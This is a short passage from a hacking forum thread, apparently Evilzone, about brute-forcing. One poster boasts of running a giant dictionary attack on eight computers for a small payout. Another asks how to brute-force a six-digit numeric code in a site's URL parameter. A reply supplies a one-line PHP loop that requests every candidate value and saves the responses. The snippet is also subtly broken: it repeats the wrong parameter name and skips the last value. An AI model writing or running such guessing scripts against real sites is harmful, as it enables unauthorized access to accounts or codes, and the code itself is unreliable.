0 Members and 9 Guests are viewing this topic.
Lets pretend this dictionary has every word from "aaaaaaaaaaa" to "///////////". Now uh, should make this. Who cares if it doesnt finish, I could at least get some, right?
Alright guys. Guys. I know this is as important to you as it is to me, so I have some good news. I have at least 8 computers that can be running this nonstop 24/7. And if my calculations are correct, that will only take 8.45 days. So we can do this!10 juicy dollars
hii i want to brute force on url which is like site.com/code?u=12345678901234&p=123456 and i just want to brute force on the p value and it contains only number of 6 digit.
for($i=0;$i<999999;$i++){ file_put_contents($i.'.html', file_get_contents('http://evilzone.org/index.php?u=12345678901234&u='.$i));}